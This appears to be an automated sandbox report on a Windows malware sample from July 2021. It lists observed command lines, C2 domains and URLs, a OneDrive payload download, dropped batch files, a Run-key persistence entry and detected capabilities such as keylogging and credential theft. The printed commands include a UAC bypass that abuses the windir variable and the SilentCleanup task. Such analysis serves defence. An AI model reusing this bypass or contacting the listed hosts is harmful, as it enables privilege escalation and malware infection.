Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 30, 2021, 10:26 a.m. | July 30, 2021, 10:30 a.m. |
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
2668 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
620 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2660
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
1836
-
-
IP Address | Status | Action |
---|---|---|
108.62.76.146 | Active | Moloch |
13.107.42.12 | Active | Moloch |
13.107.42.13 | Active | Moloch |
159.203.181.190 | Active | Moloch |
164.124.101.2 | Active | Moloch |
192.185.236.169 | Active | Moloch |
194.58.112.174 | Active | Moloch |
34.102.136.180 | Active | Moloch |
52.58.78.16 | Active | Moloch |
66.45.250.213 | Active | Moloch |
75.2.115.196 | Active | Moloch |
91.195.240.94 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49201 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLSv1 192.168.56.101:49202 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLSv1 192.168.56.101:49200 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | CN=onedrive.com | 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de |
section | CODE |
section | DATA |
section | BSS |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.lawmetricssolicitors.com/6mam/?t6Alv2A=4Gj0yn3nr4YWFpZH4qn2bQ/Mf+Y/K54EnXCw/FRHgkyWUNrW3vdYTE+qdBaiGkNQ4kKGGQ8H&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.cannamalism.com/6mam/?t6Alv2A=kn71xoO9iU2mX4j71h7bz8HHhkUEjJyTF2/azklG2erytyCHrh0zJMDeYoghQinFk6RtaMTe&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.kykyryky.art/6mam/?t6Alv2A=YhmCqIEbUGfuw5buP1ux4NwPyUbKdSmuBWvVd54Q/24mN/u1gMwH9i6nnbSMiSrA5lPx01TB&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.mobiessence.com/6mam/?t6Alv2A=KE8gpfUGztMVNWKMFV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjBrPfhHuDJ31Wqk/Ne1S&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.annettebrownlee.com/6mam/?t6Alv2A=Ha/mqQzo1OymR3PjStfn+lIoGvmqdNIZRSzA7EGDhkCDDPdeV8pHgJAz15x41PetfVMQIZVa&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.fuzhourexian.com/6mam/?t6Alv2A=qbpZFH7voKbXHHWLfMfEAiwyGaz4A1Dlq6aJ6MnbqPgDgfYDR2UnLoNROh/k48NFxcmn1xi3&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.bransolute.com/6mam/?t6Alv2A=3lOIhqUq6P+U3Pv+KiDZArCwgFDmfekdTy2Nm2rSf3PvYUYfwCDamY7ww9DFIoj1y02HC7Ks&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.miamiqueensdress.com/6mam/?t6Alv2A=EBok50QODh/qmCP7J2xI5qJEvLCVP7z6QxySw5ZUrU5I7S6miF2cwhtfnH/LuNQ5P6YcYCdk&PV=FjVH4F7XA4IHzH0p | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.beastninjas.com/6mam/?t6Alv2A=oQhTdcG35KVC+c6Wc2Ae/5c2EVHHJUmgpuEXLTkVZHJt0CPiQFk8QVOcUVYqLYUeTWjjNSS/&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.lawmetricssolicitors.com/6mam/ |
request | GET http://www.lawmetricssolicitors.com/6mam/?t6Alv2A=4Gj0yn3nr4YWFpZH4qn2bQ/Mf+Y/K54EnXCw/FRHgkyWUNrW3vdYTE+qdBaiGkNQ4kKGGQ8H&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.cannamalism.com/6mam/ |
request | GET http://www.cannamalism.com/6mam/?t6Alv2A=kn71xoO9iU2mX4j71h7bz8HHhkUEjJyTF2/azklG2erytyCHrh0zJMDeYoghQinFk6RtaMTe&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.kykyryky.art/6mam/ |
request | GET http://www.kykyryky.art/6mam/?t6Alv2A=YhmCqIEbUGfuw5buP1ux4NwPyUbKdSmuBWvVd54Q/24mN/u1gMwH9i6nnbSMiSrA5lPx01TB&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.mobiessence.com/6mam/ |
request | GET http://www.mobiessence.com/6mam/?t6Alv2A=KE8gpfUGztMVNWKMFV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjBrPfhHuDJ31Wqk/Ne1S&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.annettebrownlee.com/6mam/ |
request | GET http://www.annettebrownlee.com/6mam/?t6Alv2A=Ha/mqQzo1OymR3PjStfn+lIoGvmqdNIZRSzA7EGDhkCDDPdeV8pHgJAz15x41PetfVMQIZVa&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.fuzhourexian.com/6mam/ |
request | GET http://www.fuzhourexian.com/6mam/?t6Alv2A=qbpZFH7voKbXHHWLfMfEAiwyGaz4A1Dlq6aJ6MnbqPgDgfYDR2UnLoNROh/k48NFxcmn1xi3&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.bransolute.com/6mam/ |
request | GET http://www.bransolute.com/6mam/?t6Alv2A=3lOIhqUq6P+U3Pv+KiDZArCwgFDmfekdTy2Nm2rSf3PvYUYfwCDamY7ww9DFIoj1y02HC7Ks&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.miamiqueensdress.com/6mam/ |
request | GET http://www.miamiqueensdress.com/6mam/?t6Alv2A=EBok50QODh/qmCP7J2xI5qJEvLCVP7z6QxySw5ZUrU5I7S6miF2cwhtfnH/LuNQ5P6YcYCdk&PV=FjVH4F7XA4IHzH0p |
request | POST http://www.beastninjas.com/6mam/ |
request | GET http://www.beastninjas.com/6mam/?t6Alv2A=oQhTdcG35KVC+c6Wc2Ae/5c2EVHHJUmgpuEXLTkVZHJt0CPiQFk8QVOcUVYqLYUeTWjjNSS/&PV=FjVH4F7XA4IHzH0p |
request | GET https://onedrive.live.com/download?cid=7AD84143EE0A85E3&resid=7AD84143EE0A85E3%21111&authkey=AJ7X28D7DpibhQI |
request | GET https://pxqrda.sn.files.1drv.com/y4mVUIaLYjXuhlSuH8C1Poa6N3fD118-kF46y9jgrvjs4vHSLl_xoQY8wtd55BrthF7v-t2d5iFTz3s04C-BMPlOqQiz_sp9Nq8AydX_6J43UIPYHQYcKPvL0MSauM_3AiyMxp9MgKXUTADQfTWxkAFhyB6W1aY9eGKGxPp7V9S8EPug4FwOk9pew7dmpHlBWZpLVhDGiWIkVKnKs_kwtfIdA/Vmxgjqhexkgjojgjzjujxckxtulzbsg?download&psid=1 |
request | GET https://pxqrda.sn.files.1drv.com/y4m__S5cMVGcFy7pOBpoFvjnko8AL4p5khOaFXAKHOBONod9wuptZWr2NXTzHqD7-lpVg0Z4e_BbFaeA2ebB7pnq1ItYlfdo7T9V2lPne4uS7rnHRVQMTtbazlN6QF3Xvr5ttEMxOdNqoE0LgqtrG6gcR5LA7BtUZnWvmd77YgDv9vnlh7Jo_tCsgbTdO9ifvgRNPf5-a2WZhEpH7Ud0Xg7oA/Vmxgjqhexkgjojgjzjujxckxtulzbsg?download&psid=1 |
request | POST http://www.lawmetricssolicitors.com/6mam/ |
request | POST http://www.cannamalism.com/6mam/ |
request | POST http://www.kykyryky.art/6mam/ |
request | POST http://www.mobiessence.com/6mam/ |
request | POST http://www.annettebrownlee.com/6mam/ |
request | POST http://www.fuzhourexian.com/6mam/ |
request | POST http://www.bransolute.com/6mam/ |
request | POST http://www.miamiqueensdress.com/6mam/ |
request | POST http://www.beastninjas.com/6mam/ |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\Public\UKO.bat |
file | C:\Users\Public\Libraries\Vmxgjqh\Vmxgjqh.exe |
file | C:\Users\Public\Trast.bat |
file | C:\Users\Public\nest.bat |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread |
cmdline | reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
cmdline | reg delete hkcu\Environment /v windir /f |
cmdline | C:\Program Files (x86)\internet explorer\ieinstal.exe |
buffer | Buffer with sha1: 6d25230b3e4927b4fad30c94eebaa72cd1cf11c5 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Vmxgjqh | reg_value | C:\Users\Public\Libraries\hqjgxmV.url |